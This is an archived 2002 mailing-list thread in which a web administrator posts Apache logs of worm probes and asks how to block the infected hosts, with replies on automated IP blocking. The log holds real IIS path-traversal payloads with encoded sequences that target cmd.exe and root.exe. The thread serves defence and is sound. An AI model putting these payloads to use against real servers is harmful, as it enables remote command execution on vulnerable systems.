[Techtalk] outlook virii
James
james at james-web.net
Sat Apr 13 09:53:56 EST 2002
There was, during the first CR outbreak. I think it would be way too
big for anyone to manage now :/
- James
> -----Original Message-----
> From: techtalk-admin at linuxchix.org
[mailto:techtalk-admin at linuxchix.org]
> On Behalf Of jennyw
> Sent: Saturday, April 13, 2002 1:44 AM
> To: Techtalk at linuxchix.org
> Subject: Re: [Techtalk] outlook virii
>
> I wonder if there's a Web site that lists the IPs of all infected
> machines. That might be interesting ...
>
> Jen
>
> On Fri, Apr 12, 2002 at 10:43:26PM -0400, James wrote:
> > I remember someone that made a Perl script which added offending IPs
to
> > a ipchains/iptables block list.
> >
> > However, automated is BAD. If this procedure caught on, virii
writers
> > might spoof IPs as a snub to those who do this. Imagine if suddenly
> > you've blackholed localhost or your gateway or your DNS servers or
> > everything else in your Class C.
> >
> > Basically, I just laugh at Nimda/CR trying to compromise my Apache
> > server and weep because of all the people who are still
> > vulnerable/infected.
> >
> > - James
> >
> > > -----Original Message-----
> > > From: techtalk-admin at linuxchix.org
> > [mailto:techtalk-admin at linuxchix.org]
> > > On Behalf Of Davis, Jennifer
> > > Sent: Friday, April 12, 2002 5:20 PM
> > > To: 'Techtalk at linuxchix.org'
> > > Subject: [Techtalk] outlook virii
> > >
> > > Hi:
> > >
> > > I was wondering if it was possible to send some sort of message
> > back
> > > to people. (like maybe a popup message) when they hit my webserver
> > that
> > > surfing with viruses on their system is just not cool See an
except
> > from
> > > my
> > > log below. I estimate that 95% of the hits to my web server are
these
> > > exploit attempts. Barring that is there a way to block an IP that
> > we'll
> > > say
> > > is looking for root.exe? The weserver is a standard Apache 1.3?
that
> > > came
> > > with Slackware 8.0.
> > >
> > > Thanks again
> > > Jenn
> > >
> > > Jennifer Davis
> > > Constitutional & Administrative Law - Droit administratif &
> > > constitutionnel
> > > Department of Justice Canada - Minist?re de la Justice du Canada
> > > *(613) 957-4963 - fx (613) 941-1937
> > > *jdavis at justice.gc.ca
> > >
> > > 64.168.22.13 - - [10/Apr/2002:17:10:57 -0400] "GET
> > > /scripts/root.exe?/c+dir
> > > HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET
> > /MSADC/root.exe?/c+dir
> > > HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET
> > > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:10:59 -0400] "GET
> > > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET
> > > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET
> > >
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > > HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:01 -0400] "GET
> > >
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > > HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:01 -0400] "GET
> > >
> >
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn
> > t/
> > > sy
> > > stem32/cmd.exe?/c+dir HTTP$
> > > 64.168.22.13 - - [10/Apr/2002:17:11:02 -0400] "GET
> > > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:03 -0400] "GET
> > > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET
> > > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET
> > > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:05 -0400] "GET
> > > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
285
> > > 64.168.22.13 - - [10/Apr/2002:17:11:05 -0400] "GET
> > > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
> > > 64.168.22.13 - - [10/Apr/2002:17:11:06 -0400] "GET
> > > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
> > 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:06 -0400] "GET
> > > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
1601
> > >
> > >
> > >
> > >
> > > _______________________________________________
> > > Techtalk mailing list
> > > Techtalk at linuxchix.org
> > > http://mailman.linuxchix.org/mailman/listinfo/techtalk
> >
> > _______________________________________________
> > Techtalk mailing list
> > Techtalk at linuxchix.org
> > http://mailman.linuxchix.org/mailman/listinfo/techtalk
> >
> >
> _______________________________________________
> Techtalk mailing list
> Techtalk at linuxchix.org
> http://mailman.linuxchix.org/mailman/listinfo/techtalk
More information about the Techtalk
mailing list